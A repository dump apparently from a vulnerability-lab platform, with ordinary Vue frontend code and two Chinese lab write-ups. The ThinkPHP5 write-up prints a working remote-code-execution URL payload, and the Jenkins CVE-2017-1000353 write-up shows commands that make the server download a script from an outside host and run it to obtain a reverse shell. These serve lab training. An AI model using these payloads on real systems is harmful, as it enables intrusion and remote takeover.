/vulfocus-frontend/src/layout/components/Sidebar/Link.vue:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
37 |
--------------------------------------------------------------------------------
/vulfocus-frontend/src/layout/components/index.js:
--------------------------------------------------------------------------------
1 | export { default as Navbar } from './Navbar'
2 | export { default as Sidebar } from './Sidebar'
3 | export { default as AppMain } from './AppMain'
4 |
--------------------------------------------------------------------------------
/vulfocus-frontend/src/less/index.css:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/vulfocus-frontend/src/less/index.css
--------------------------------------------------------------------------------
/vulfocus-frontend/src/less/index.less:
--------------------------------------------------------------------------------
1 | @theme-color:#f3f3f3;
2 | @theme-font-color:#525252;
--------------------------------------------------------------------------------
/vulfocus-frontend/src/settings.js:
--------------------------------------------------------------------------------
1 | module.exports = {
2 |
3 | title: 'vulfocus',
4 |
5 | /**
6 | * @type {boolean} true | false
7 | * @description Whether fix the header
8 | */
9 | fixedHeader: true,
10 |
11 | /**
12 | * @type {boolean} true | false
13 | * @description Whether show the logo in sidebar
14 | */
15 | sidebarLogo: false
16 | }
17 |
--------------------------------------------------------------------------------
/vulfocus-frontend/src/store/getters.js:
--------------------------------------------------------------------------------
1 | const getters = {
2 | sidebar: state => state.app.sidebar,
3 | device: state => state.app.device,
4 | token: state => state.user.token,
5 | avatar: state => state.user.avatar,
6 | rank: state => state.user.rank,
7 | name: state => state.user.name,
8 | roles: state => state.user.roles,
9 | email: state => state.user.email,
10 | greenhand: state => state.user.greenhand,
11 | permission_routes: state => state.permission.routes,
12 | licence: state => state.user.licence,
13 | }
14 | export default getters
15 |
--------------------------------------------------------------------------------
/vulfocus-frontend/src/store/index.js:
--------------------------------------------------------------------------------
1 | import Vue from 'vue'
2 | import Vuex from 'vuex'
3 | import getters from './getters'
4 | import app from './modules/app'
5 | import settings from './modules/settings'
6 | import user from './modules/user'
7 | import permission from './modules/permission'
8 |
9 | Vue.use(Vuex)
10 |
11 | const store = new Vuex.Store({
12 | modules: {
13 | app,
14 | settings,
15 | user,
16 | permission,
17 | },
18 | getters
19 | })
20 |
21 | export default store
22 |
--------------------------------------------------------------------------------
/vulfocus-frontend/src/store/modules/settings.js:
--------------------------------------------------------------------------------
1 | import defaultSettings from '@/settings'
2 |
3 | const { showSettings, fixedHeader, sidebarLogo } = defaultSettings
4 |
5 | const state = {
6 | showSettings: showSettings,
7 | fixedHeader: fixedHeader,
8 | sidebarLogo: sidebarLogo
9 | }
10 |
11 | const mutations = {
12 | CHANGE_SETTING: (state, { key, value }) => {
13 | if (state.hasOwnProperty(key)) {
14 | state[key] = value
15 | }
16 | }
17 | }
18 |
19 | const actions = {
20 | changeSetting({ commit }, data) {
21 | commit('CHANGE_SETTING', data)
22 | }
23 | }
24 |
25 | export default {
26 | namespaced: true,
27 | state,
28 | mutations,
29 | actions
30 | }
31 |
32 |
--------------------------------------------------------------------------------
/vulfocus-frontend/src/styles/element-ui.scss:
--------------------------------------------------------------------------------
1 | // cover some element-ui styles
2 |
3 | .el-breadcrumb__inner,
4 | .el-breadcrumb__inner a {
5 | font-weight: 400 !important;
6 | }
7 |
8 | .el-upload {
9 | input[type="file"] {
10 | display: none !important;
11 | }
12 | }
13 |
14 | .el-upload__input {
15 | display: none;
16 | }
17 |
18 |
19 | // to fixed https://github.com/ElemeFE/element/issues/2461
20 | .el-dialog {
21 | transform: none;
22 | left: 0;
23 | position: relative;
24 | margin: 0 auto;
25 | }
26 |
27 | // refine element ui upload
28 | .upload-container {
29 | .el-upload {
30 | width: 100%;
31 |
32 | .el-upload-dragger {
33 | width: 100%;
34 | height: 200px;
35 | }
36 | }
37 | }
38 |
39 | // dropdown
40 | .el-dropdown-menu {
41 | a {
42 | display: block
43 | }
44 | }
45 |
--------------------------------------------------------------------------------
/vulfocus-frontend/src/styles/mixin.scss:
--------------------------------------------------------------------------------
1 | @mixin clearfix {
2 | &:after {
3 | content: "";
4 | display: table;
5 | clear: both;
6 | }
7 | }
8 |
9 | @mixin scrollBar {
10 | &::-webkit-scrollbar-track-piece {
11 | background: #d3dce6;
12 | }
13 |
14 | &::-webkit-scrollbar {
15 | width: 6px;
16 | }
17 |
18 | &::-webkit-scrollbar-thumb {
19 | background: #99a9bf;
20 | border-radius: 20px;
21 | }
22 | }
23 |
24 | @mixin relative {
25 | position: relative;
26 | width: 100%;
27 | height: 100%;
28 | }
29 |
--------------------------------------------------------------------------------
/vulfocus-frontend/src/styles/transition.scss:
--------------------------------------------------------------------------------
1 | // global transition css
2 |
3 | /* fade */
4 | .fade-enter-active,
5 | .fade-leave-active {
6 | transition: opacity 0.28s;
7 | }
8 |
9 | .fade-enter,
10 | .fade-leave-active {
11 | opacity: 0;
12 | }
13 |
14 | /* fade-transform */
15 | .fade-transform-leave-active,
16 | .fade-transform-enter-active {
17 | transition: all .5s;
18 | }
19 |
20 | .fade-transform-enter {
21 | opacity: 0;
22 | transform: translateX(-30px);
23 | }
24 |
25 | .fade-transform-leave-to {
26 | opacity: 0;
27 | transform: translateX(30px);
28 | }
29 |
30 | /* breadcrumb transition */
31 | .breadcrumb-enter-active,
32 | .breadcrumb-leave-active {
33 | transition: all .5s;
34 | }
35 |
36 | .breadcrumb-enter,
37 | .breadcrumb-leave-active {
38 | opacity: 0;
39 | transform: translateX(20px);
40 | }
41 |
42 | .breadcrumb-move {
43 | transition: all .5s;
44 | }
45 |
46 | .breadcrumb-leave-active {
47 | position: absolute;
48 | }
49 |
--------------------------------------------------------------------------------
/vulfocus-frontend/src/styles/variables.scss:
--------------------------------------------------------------------------------
1 | // sidebar
2 | $menuText:#bfcbd9;
3 | $menuActiveText:#409EFF;
4 | $subMenuActiveText:#f4f4f5; //https://github.com/ElemeFE/element/issues/12951
5 |
6 | $menuBg:#304156;
7 | $menuHover:#263445;
8 |
9 | $subMenuBg:#1f2d3d;
10 | $subMenuHover:#001528;
11 |
12 | $sideBarWidth: 210px;
13 |
14 | // the :export directive is the magic sauce for webpack
15 | // https://www.bluematador.com/blog/how-to-share-variables-between-js-and-sass
16 | :export {
17 | menuText: $menuText;
18 | menuActiveText: $menuActiveText;
19 | subMenuActiveText: $subMenuActiveText;
20 | menuBg: $menuBg;
21 | menuHover: $menuHover;
22 | subMenuBg: $subMenuBg;
23 | subMenuHover: $subMenuHover;
24 | sideBarWidth: $sideBarWidth;
25 | }
26 |
--------------------------------------------------------------------------------
/vulfocus-frontend/src/utils/auth.js:
--------------------------------------------------------------------------------
1 | import Cookies from 'js-cookie'
2 |
3 | const TokenKey = 'vue_admin_template_token'
4 |
5 | export function getToken() {
6 | return Cookies.get(TokenKey)
7 | }
8 |
9 | export function setToken(token) {
10 | return Cookies.set(TokenKey, token)
11 | }
12 |
13 | export function removeToken() {
14 | return Cookies.remove(TokenKey)
15 | }
16 |
--------------------------------------------------------------------------------
/vulfocus-frontend/src/utils/get-page-title.js:
--------------------------------------------------------------------------------
1 | import defaultSettings from '@/settings'
2 | import request from '@/utils/request'
3 |
4 | const title = defaultSettings.title || 'Vue Admin Template'
5 | let t = ""
6 |
7 | export default function getPageTitle(pageTitle) {
8 | if (pageTitle) {
9 | getUrlName().then(res=>{
10 | t = res
11 | })
12 | if (t.data){
13 | return `${pageTitle} - ${t.data}`
14 | }else {
15 | return `${pageTitle} - ${title}`
16 | }
17 |
18 | }else {
19 | getUrlName().then(res=>{
20 | t = res
21 | document.title = t.data || 'vulfocus'
22 | })
23 | return `${title}`
24 | }
25 | }
26 | function getUrlName() {
27 | return request({
28 | url: "get/urlname",
29 | method: 'get'
30 | })
31 | }
32 |
33 |
--------------------------------------------------------------------------------
/vulfocus-frontend/src/utils/validate.js:
--------------------------------------------------------------------------------
1 | /**
2 | * Created by PanJiaChen on 16/11/18.
3 | */
4 |
5 | /**
6 | * @param {string} path
7 | * @returns {Boolean}
8 | */
9 | export function isExternal(path) {
10 | return /^(https?:|mailto:|tel:)/.test(path)
11 | }
12 |
13 | /**
14 | * @param {string} str
15 | * @returns {Boolean}
16 | */
17 | export function validUsername(str) {
18 | const valid_map = ['admin', 'editor']
19 | return valid_map.indexOf(str.trim()) >= 0
20 | }
21 |
--------------------------------------------------------------------------------
/vulfocus-frontend/tests/unit/.eslintrc.js:
--------------------------------------------------------------------------------
1 | module.exports = {
2 | env: {
3 | jest: true
4 | }
5 | }
6 |
--------------------------------------------------------------------------------
/vulfocus-frontend/tests/unit/components/Hamburger.spec.js:
--------------------------------------------------------------------------------
1 | import { shallowMount } from '@vue/test-utils'
2 | import Hamburger from '@/components/Hamburger/index.vue'
3 | describe('Hamburger.vue', () => {
4 | it('toggle click', () => {
5 | const wrapper = shallowMount(Hamburger)
6 | const mockFn = jest.fn()
7 | wrapper.vm.$on('toggleClick', mockFn)
8 | wrapper.find('.hamburger').trigger('click')
9 | expect(mockFn).toBeCalled()
10 | })
11 | it('prop isActive', () => {
12 | const wrapper = shallowMount(Hamburger)
13 | wrapper.setProps({ isActive: true })
14 | expect(wrapper.contains('.is-active')).toBe(true)
15 | wrapper.setProps({ isActive: false })
16 | expect(wrapper.contains('.is-active')).toBe(false)
17 | })
18 | })
19 |
--------------------------------------------------------------------------------
/vulfocus-frontend/tests/unit/components/SvgIcon.spec.js:
--------------------------------------------------------------------------------
1 | import { shallowMount } from '@vue/test-utils'
2 | import SvgIcon from '@/components/SvgIcon/index.vue'
3 | describe('SvgIcon.vue', () => {
4 | it('iconClass', () => {
5 | const wrapper = shallowMount(SvgIcon, {
6 | propsData: {
7 | iconClass: 'test'
8 | }
9 | })
10 | expect(wrapper.find('use').attributes().href).toBe('#icon-test')
11 | })
12 | it('className', () => {
13 | const wrapper = shallowMount(SvgIcon, {
14 | propsData: {
15 | iconClass: 'test'
16 | }
17 | })
18 | expect(wrapper.classes().length).toBe(1)
19 | wrapper.setProps({ className: 'test' })
20 | expect(wrapper.classes().includes('test')).toBe(true)
21 | })
22 | })
23 |
--------------------------------------------------------------------------------
/vulfocus-frontend/tests/unit/utils/parseTime.spec.js:
--------------------------------------------------------------------------------
1 | import { parseTime } from '@/utils/index.js'
2 |
3 | describe('Utils:parseTime', () => {
4 | const d = new Date('2018-07-13 17:54:01') // "2018-07-13 17:54:01"
5 | it('timestamp', () => {
6 | expect(parseTime(d)).toBe('2018-07-13 17:54:01')
7 | })
8 | it('ten digits timestamp', () => {
9 | expect(parseTime((d / 1000).toFixed(0))).toBe('2018-07-13 17:54:01')
10 | })
11 | it('new Date', () => {
12 | expect(parseTime(new Date(d))).toBe('2018-07-13 17:54:01')
13 | })
14 | it('format', () => {
15 | expect(parseTime(d, '{y}-{m}-{d} {h}:{i}')).toBe('2018-07-13 17:54')
16 | expect(parseTime(d, '{y}-{m}-{d}')).toBe('2018-07-13')
17 | expect(parseTime(d, '{y}/{m}/{d} {h}-{i}')).toBe('2018/07/13 17-54')
18 | })
19 | it('get the day of the week', () => {
20 | expect(parseTime(d, '{a}')).toBe('五') // 星期五
21 | })
22 | it('get the day of the week', () => {
23 | expect(parseTime(+d + 1000 * 60 * 60 * 24 * 2, '{a}')).toBe('日') // 星期日
24 | })
25 | it('empty argument', () => {
26 | expect(parseTime()).toBeNull()
27 | })
28 | })
29 |
--------------------------------------------------------------------------------
/vulfocus-frontend/tests/unit/utils/validate.spec.js:
--------------------------------------------------------------------------------
1 | import { validUsername, isExternal } from '@/utils/validate.js'
2 |
3 | describe('Utils:validate', () => {
4 | it('validUsername', () => {
5 | expect(validUsername('admin')).toBe(true)
6 | expect(validUsername('editor')).toBe(true)
7 | expect(validUsername('xxxx')).toBe(false)
8 | })
9 | it('isExternal', () => {
10 | expect(isExternal('https://github.com/PanJiaChen/vue-element-admin')).toBe(true)
11 | expect(isExternal('http://github.com/PanJiaChen/vue-element-admin')).toBe(true)
12 | expect(isExternal('github.com/PanJiaChen/vue-element-admin')).toBe(false)
13 | expect(isExternal('/dashboard')).toBe(false)
14 | expect(isExternal('./dashboard')).toBe(false)
15 | expect(isExternal('dashboard')).toBe(false)
16 | })
17 | })
18 |
--------------------------------------------------------------------------------
/writeup/CNVD-2018-24942/24942-1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CNVD-2018-24942/24942-1.png
--------------------------------------------------------------------------------
/writeup/CNVD-2018-24942/24942-2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CNVD-2018-24942/24942-2.png
--------------------------------------------------------------------------------
/writeup/CNVD-2018-24942/24942-3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CNVD-2018-24942/24942-3.png
--------------------------------------------------------------------------------
/writeup/CNVD-2018-24942/CNVD-2018-24942.md:
--------------------------------------------------------------------------------
1 | # ThinkPHP5 远程代码执行漏洞(CNVD-2018-24942)by [M2ayill](https://github.com/M2ayill)
2 |
3 | ## 一、漏洞描述
4 |
5 | ThinkPHP5 存在远程代码执行漏洞。该漏洞由于框架对控制器名未能进行足够的检测,攻击者利用该漏洞对目标网站进行远程命令执行攻击。
6 |
7 | ## 二、影响产品
8 |
9 | 上海顶想信息科技有限公司 ThinkPHP 5.*,<5.1.31
10 |
11 | 上海顶想信息科技有限公司 ThinkPHP <=5.0.23
12 |
13 | ## 三、利用流程
14 |
15 | 1 此漏洞对应靶场环境为 thinkphp5x 任意代码执行漏洞 (cnvd-2018-24942)
16 |
17 | 
18 |
19 | 2 访问其如图所示
20 |
21 | 
22 |
23 | 3 在其地址增加路径与参数即可
24 |
25 | ```
26 | /index.php/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls /tmp
27 | ```
28 |
29 | 4 成功得到 flag
30 |
31 | 
32 |
33 | 参考:
34 |
35 | https://www.cnvd.org.cn/flaw/show/CNVD-2018-24942
36 |
--------------------------------------------------------------------------------
/writeup/CVE-2012-0392/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2012-0392/1.png
--------------------------------------------------------------------------------
/writeup/CVE-2012-0392/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2012-0392/2.png
--------------------------------------------------------------------------------
/writeup/CVE-2013-2251/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2013-2251/2.png
--------------------------------------------------------------------------------
/writeup/CVE-2013-2251/3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2013-2251/3.png
--------------------------------------------------------------------------------
/writeup/CVE-2013-2251/4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2013-2251/4.png
--------------------------------------------------------------------------------
/writeup/CVE-2013-2251/5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2013-2251/5.png
--------------------------------------------------------------------------------
/writeup/CVE-2013-2251/6.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2013-2251/6.png
--------------------------------------------------------------------------------
/writeup/CVE-2013-2251/7.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2013-2251/7.png
--------------------------------------------------------------------------------
/writeup/CVE-2013-2251/8.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2013-2251/8.png
--------------------------------------------------------------------------------
/writeup/CVE-2013-2251/qidong.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2013-2251/qidong.png
--------------------------------------------------------------------------------
/writeup/CVE-2013-2251/struts2-016远程命令执行.md:
--------------------------------------------------------------------------------
1 | 2312312
--------------------------------------------------------------------------------
/writeup/CVE-2014-3120/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2014-3120/1.png
--------------------------------------------------------------------------------
/writeup/CVE-2014-3120/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2014-3120/2.png
--------------------------------------------------------------------------------
/writeup/CVE-2014-3120/3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2014-3120/3.png
--------------------------------------------------------------------------------
/writeup/CVE-2014-3120/4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2014-3120/4.png
--------------------------------------------------------------------------------
/writeup/CVE-2014-3120/5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2014-3120/5.png
--------------------------------------------------------------------------------
/writeup/CVE-2014-3120/6.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2014-3120/6.png
--------------------------------------------------------------------------------
/writeup/CVE-2016-10033/20200513100231.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2016-10033/20200513100231.png
--------------------------------------------------------------------------------
/writeup/CVE-2016-10033/20200513105416.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2016-10033/20200513105416.png
--------------------------------------------------------------------------------
/writeup/CVE-2016-10033/20200513111049.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2016-10033/20200513111049.png
--------------------------------------------------------------------------------
/writeup/CVE-2016-10033/20200513111132.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2016-10033/20200513111132.png
--------------------------------------------------------------------------------
/writeup/CVE-2016-10033/20200513111209.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2016-10033/20200513111209.png
--------------------------------------------------------------------------------
/writeup/CVE-2016-4437/20200515192039.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2016-4437/20200515192039.png
--------------------------------------------------------------------------------
/writeup/CVE-2016-4437/20200515192250.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2016-4437/20200515192250.png
--------------------------------------------------------------------------------
/writeup/CVE-2016-4437/20200515192539.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2016-4437/20200515192539.png
--------------------------------------------------------------------------------
/writeup/CVE-2016-4437/20200515193053.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2016-4437/20200515193053.png
--------------------------------------------------------------------------------
/writeup/CVE-2016-4437/20200515193242.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2016-4437/20200515193242.png
--------------------------------------------------------------------------------
/writeup/CVE-2016-4437/20200515193549.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2016-4437/20200515193549.png
--------------------------------------------------------------------------------
/writeup/CVE-2016-4437/20200515193835.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2016-4437/20200515193835.png
--------------------------------------------------------------------------------
/writeup/CVE-2017-1000353/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2017-1000353/1.png
--------------------------------------------------------------------------------
/writeup/CVE-2017-1000353/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2017-1000353/2.png
--------------------------------------------------------------------------------
/writeup/CVE-2017-1000353/CVE-2017-1000353.md:
--------------------------------------------------------------------------------
1 | # Jenkins 命令执行漏洞(CVE-2017-1000353) by [Vdeem](https://github.com/Vdeem)
2 |
3 | ## 一、漏洞描述
4 |
5 | Jenkins 未授权远程代码执行漏洞, 允许攻击者将序列化的 Java SignedObject 对象传输给 Jenkins CLI 处理,反序列化 ObjectInputStream 作为 Command 对象,这将绕过基于黑名单的保护机制, 导致代码执行。
6 |
7 | ## 二、利用流程
8 |
9 | 1 对应环境为 Jenkins 远程代码执行漏洞(CVE-2017-1000353)
10 |
11 | 
12 |
13 | 2 利用工具https://github.com/vulhub/CVE-2017-1000353
14 |
15 | 3 执行命令生成字节码文件,“ ”处填可反弹 shell 文件地址
16 |
17 | ```
18 | java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser "wget 1.1.1.1/nc.py -P /tmp"
19 | ```
20 |
21 | 4 发送数据包,执行命令,使文件下载到服务器
22 |
23 | ```
24 | python exploit.py http://your-ip:8080 jenkins_poc.ser
25 | ```
26 |
27 | 
28 |
29 | 5 生成字节码文件,“ ”处填写要执行的脚本
30 |
31 | ```
32 | java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser "/bin/bash /tmp/nc.py"
33 | ```
34 |
35 | 6 发送数据包,执行脚本
36 |
37 | ```
38 | python exploit.py http://your-ip:8080 jenkins_poc.ser
39 | ```
40 |
41 | 7 可反弹shell
42 |
43 |
--------------------------------------------------------------------------------
/writeup/CVE-2017-10271/1.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2017-10271/1.jpg
--------------------------------------------------------------------------------
/writeup/CVE-2017-10271/2.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2017-10271/2.jpg
--------------------------------------------------------------------------------
/writeup/CVE-2017-10271/3.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2017-10271/3.jpg
--------------------------------------------------------------------------------
/writeup/CVE-2017-11610/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2017-11610/1.png
--------------------------------------------------------------------------------
/writeup/CVE-2017-11610/3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2017-11610/3.png
--------------------------------------------------------------------------------
/writeup/CVE-2017-11610/4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2017-11610/4.png
--------------------------------------------------------------------------------
/writeup/CVE-2017-11610/5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2017-11610/5.png
--------------------------------------------------------------------------------
/writeup/CVE-2017-11610/6.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2017-11610/6.png
--------------------------------------------------------------------------------
/writeup/CVE-2017-12149/1.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2017-12149/1.jpg
--------------------------------------------------------------------------------
/writeup/CVE-2017-12149/2.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2017-12149/2.jpg
--------------------------------------------------------------------------------
/writeup/CVE-2017-12149/3.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2017-12149/3.jpg
--------------------------------------------------------------------------------
/writeup/CVE-2017-12615/12615-1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2017-12615/12615-1.png
--------------------------------------------------------------------------------
/writeup/CVE-2017-12615/12615-2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2017-12615/12615-2.png
--------------------------------------------------------------------------------
/writeup/CVE-2017-12615/12615-3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2017-12615/12615-3.png
--------------------------------------------------------------------------------
/writeup/CVE-2017-12615/12615-4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2017-12615/12615-4.png
--------------------------------------------------------------------------------
/writeup/CVE-2017-12615/12615-5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2017-12615/12615-5.png
--------------------------------------------------------------------------------
/writeup/CVE-2017-12636/20200515111605.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2017-12636/20200515111605.png
--------------------------------------------------------------------------------
/writeup/CVE-2017-12636/20200515111756.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2017-12636/20200515111756.png
--------------------------------------------------------------------------------
/writeup/CVE-2017-12636/20200515111844.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2017-12636/20200515111844.png
--------------------------------------------------------------------------------
/writeup/CVE-2017-12636/20200515112457.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2017-12636/20200515112457.png
--------------------------------------------------------------------------------
/writeup/CVE-2017-12636/20200515112524.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2017-12636/20200515112524.png
--------------------------------------------------------------------------------
/writeup/CVE-2017-12636/20200515113359.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2017-12636/20200515113359.png
--------------------------------------------------------------------------------
/writeup/CVE-2017-12636/20200515190126.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2017-12636/20200515190126.png
--------------------------------------------------------------------------------
/writeup/CVE-2017-3066/20200516152000.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2017-3066/20200516152000.png
--------------------------------------------------------------------------------
